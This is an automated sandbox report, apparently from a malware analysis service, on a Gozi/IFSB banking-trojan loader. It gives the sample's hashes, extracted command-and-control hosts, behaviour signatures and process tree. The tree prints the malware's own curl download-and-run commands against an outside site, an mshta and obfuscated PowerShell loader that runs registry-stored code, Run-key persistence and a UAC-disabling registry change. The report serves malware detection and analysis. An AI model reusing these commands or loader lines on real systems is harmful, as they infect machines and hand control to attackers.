Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220310-en -
submitted
22/03/2022, 09:41
Static task
static1
Behavioral task
behavioral1
Sample
98b082b4d65dfe4ee5b227575d1c08ef.exe
Resource
win7-20220310-en
General
-
Target
98b082b4d65dfe4ee5b227575d1c08ef.exe
-
Size
215KB
-
MD5
98b082b4d65dfe4ee5b227575d1c08ef
-
SHA1
21d9d7f91bdab90a3900832404be3bab06e82c03
-
SHA256
e7767ba8bcff3242dd32f880cb59894c3ce5615a2557504db976803cd246354e
-
SHA512
e7e46e85699716dec1aedce1dbc7e995f5507b1de137c77110225e162ac2ffcfeedd50f2e5292302043f445ef0eaf7fc551edcf43a195d815c2c1f15469dc8c1
Malware Config
Extracted
gozi_ifsb
3000
config.edge.skype.com
194.76.226.200
giporedtrip.at
habpfans.at
31.214.157.187
-
base_path
/drew/
-
build
250225
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi_ifsb
3000
config.edge.skype.com
194.76.226.200
giporedtrip.at
habpfans.at
31.214.157.187
-
base_path
/images/
-
exe_type
worker
-
extension
.jlk
-
server_id
50
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
pid Process 4896 A.exe 376 AutoIt3.exe 1768 AutoIt3.exe 620 AutoIt3.exe -
Modifies Windows Firewall 1 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation A.exe Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation AutoIt3.exe Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation mshta.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FileOptions = "cmd /c start C:\\Users\\Admin\\FileOptions.lnk -ep unrestricted -file C:\\Users\\Admin\\DiagramClass.ps1" Explorer.EXE -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 1768 set thread context of 620 1768 AutoIt3.exe 128 PID 4616 set thread context of 1048 4616 powershell.exe 54 PID 1048 set thread context of 5004 1048 Explorer.EXE 147 PID 1048 set thread context of 3440 1048 Explorer.EXE 28 PID 1048 set thread context of 3740 1048 Explorer.EXE 49 PID 5004 set thread context of 2144 5004 cmd.exe 149 PID 1048 set thread context of 3428 1048 Explorer.EXE 29 PID 1048 set thread context of 392 1048 Explorer.EXE 30 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
pid Process 4528 net.exe 3288 net.exe 3692 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 216 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4444 systeminfo.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f A.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f A.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD A.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f A.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f A.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2144 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2144 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4728 powershell.exe 4728 powershell.exe 1328 powershell.exe 1328 powershell.exe 4328 powershell.exe 4328 powershell.exe 4800 powershell.exe 4800 powershell.exe 620 AutoIt3.exe 620 AutoIt3.exe 4616 powershell.exe 4616 powershell.exe 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1048 Explorer.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 4616 powershell.exe 1048 Explorer.EXE 1048 Explorer.EXE 1048 Explorer.EXE 5004 cmd.exe 1048 Explorer.EXE 1048 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 4728 powershell.exe Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 4328 powershell.exe Token: SeDebugPrivilege 4800 powershell.exe Token: SeDebugPrivilege 4616 powershell.exe Token: SeShutdownPrivilege 1048 Explorer.EXE Token: SeCreatePagefilePrivilege 1048 Explorer.EXE Token: SeShutdownPrivilege 1048 Explorer.EXE Token: SeCreatePagefilePrivilege 1048 Explorer.EXE Token: SeDebugPrivilege 216 tasklist.exe Token: SeShutdownPrivilege 3440 RuntimeBroker.exe Token: SeShutdownPrivilege 3440 RuntimeBroker.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 1768 AutoIt3.exe 1768 AutoIt3.exe 376 AutoIt3.exe 1768 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe -
Suspicious use of SendNotifyMessage 35 IoCs
pid Process 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 1768 AutoIt3.exe 1768 AutoIt3.exe 376 AutoIt3.exe 1768 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe 376 AutoIt3.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1048 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2504 wrote to memory of 4612 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 85 PID 2504 wrote to memory of 4612 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 85 PID 2504 wrote to memory of 4612 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 85 PID 2504 wrote to memory of 4212 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 86 PID 2504 wrote to memory of 4212 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 86 PID 2504 wrote to memory of 4212 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 86 PID 4212 wrote to memory of 3296 4212 cmd.exe 87 PID 4212 wrote to memory of 3296 4212 cmd.exe 87 PID 4212 wrote to memory of 3296 4212 cmd.exe 87 PID 2504 wrote to memory of 2356 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 89 PID 2504 wrote to memory of 2356 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 89 PID 2504 wrote to memory of 2356 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 89 PID 2356 wrote to memory of 448 2356 cmd.exe 90 PID 2356 wrote to memory of 448 2356 cmd.exe 90 PID 2356 wrote to memory of 448 2356 cmd.exe 90 PID 2504 wrote to memory of 3684 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 92 PID 2504 wrote to memory of 3684 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 92 PID 2504 wrote to memory of 3684 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 92 PID 3684 wrote to memory of 3140 3684 cmd.exe 93 PID 3684 wrote to memory of 3140 3684 cmd.exe 93 PID 3684 wrote to memory of 3140 3684 cmd.exe 93 PID 2504 wrote to memory of 4012 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 95 PID 2504 wrote to memory of 4012 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 95 PID 2504 wrote to memory of 4012 2504 98b082b4d65dfe4ee5b227575d1c08ef.exe 95 PID 4012 wrote to memory of 4896 4012 cmd.exe 94 PID 4012 wrote to memory of 4896 4012 cmd.exe 94 PID 4012 wrote to memory of 4896 4012 cmd.exe 94 PID 4896 wrote to memory of 3792 4896 A.exe 97 PID 4896 wrote to memory of 3792 4896 A.exe 97 PID 3792 wrote to memory of 960 3792 cmd.exe 99 PID 3792 wrote to memory of 960 3792 cmd.exe 99 PID 4896 wrote to memory of 1692 4896 A.exe 107 PID 4896 wrote to memory of 1692 4896 A.exe 107 PID 1692 wrote to memory of 3948 1692 cmd.exe 109 PID 1692 wrote to memory of 3948 1692 cmd.exe 109 PID 4896 wrote to memory of 3036 4896 A.exe 111 PID 4896 wrote to memory of 3036 4896 A.exe 111 PID 3036 wrote to memory of 3608 3036 cmd.exe 113 PID 3036 wrote to memory of 3608 3036 cmd.exe 113 PID 4896 wrote to memory of 4228 4896 A.exe 115 PID 4896 wrote to memory of 4228 4896 A.exe 115 PID 4228 wrote to memory of 376 4228 cmd.exe 117 PID 4228 wrote to memory of 376 4228 cmd.exe 117 PID 4228 wrote to memory of 376 4228 cmd.exe 117 PID 376 wrote to memory of 4728 376 AutoIt3.exe 120 PID 376 wrote to memory of 4728 376 AutoIt3.exe 120 PID 376 wrote to memory of 4728 376 AutoIt3.exe 120 PID 4896 wrote to memory of 3472 4896 A.exe 122 PID 4896 wrote to memory of 3472 4896 A.exe 122 PID 3472 wrote to memory of 1060 3472 cmd.exe 124 PID 3472 wrote to memory of 1060 3472 cmd.exe 124 PID 4896 wrote to memory of 484 4896 A.exe 125 PID 4896 wrote to memory of 484 4896 A.exe 125 PID 484 wrote to memory of 1768 484 cmd.exe 127 PID 484 wrote to memory of 1768 484 cmd.exe 127 PID 484 wrote to memory of 1768 484 cmd.exe 127 PID 1768 wrote to memory of 620 1768 AutoIt3.exe 128 PID 1768 wrote to memory of 620 1768 AutoIt3.exe 128 PID 1768 wrote to memory of 620 1768 AutoIt3.exe 128 PID 1768 wrote to memory of 620 1768 AutoIt3.exe 128 PID 1768 wrote to memory of 620 1768 AutoIt3.exe 128 PID 376 wrote to memory of 1328 376 AutoIt3.exe 131 PID 376 wrote to memory of 1328 376 AutoIt3.exe 131 PID 376 wrote to memory of 1328 376 AutoIt3.exe 131 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System AutoIt3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" AutoIt3.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3428
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:392
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3740
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1048 -
C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe"C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c mkdir C:\Users\Admin\AppData\Roaming\EdgeData3⤵PID:4612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Windows\SysWOW64\curl.execurl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe4⤵PID:3296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll3⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\SysWOW64\curl.execurl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll4⤵PID:448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest3⤵
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\SysWOW64\curl.execurl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest4⤵PID:3140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\EdgeData\A.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4012
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xnq8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xnq8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453\\\DiagramClass'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
PID:3920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xvsleyr -value gp; new-alias -name whpcnio -value iex; whpcnio ([System.Text.Encoding]::ASCII.GetString((xvsleyr "HKCU:Software\AppDataLow\Software\Microsoft\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453").CharFolder))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4616 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.cmdline"4⤵PID:3832
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E9C.tmp" "c:\Users\Admin\AppData\Local\Temp\51nl350v\CSCC3572B61CE2C4D9983F3D2D7AFE08A9A.TMP"5⤵PID:1004
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.cmdline"4⤵PID:3808
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FC5.tmp" "c:\Users\Admin\AppData\Local\Temp\gwfwitbd\CSC970B265ABB4CA3B74729EAA4FE53D8.TMP"5⤵PID:1876
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe"2⤵
